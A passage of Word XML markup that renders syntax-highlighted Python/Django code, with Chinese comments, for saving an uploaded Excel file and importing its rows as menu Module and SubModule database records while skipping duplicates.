          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(file_path, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'wb'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>f:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">chunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>excel_file.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>chunks</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f.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(chunk)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># excel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件中内容数据入库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">wb = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>load_workbook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(excel_file)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    handle_sheet = wb.worksheets[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>从第二行开始读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">row </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>handle_sheet.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>iter_rows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>min_row</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>values_only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>True</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Module.objects.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>menus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=row[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>],).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exists</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>避免插入重复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>不存在的条目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>新建一级菜单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="7F8591"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">new_module_obj </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>= Module.objects.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>create</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>menus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=row[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=row[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>order</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=row[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>icon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=row[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3</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ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        first_module_obj = Module.objects.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>menus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=row[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SubModule.objects.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>menus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">=first_module_obj, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>child</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=row[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>],).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exists</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7F8591"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">new_sub_module_obj </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>= SubModule.objects.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>create</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
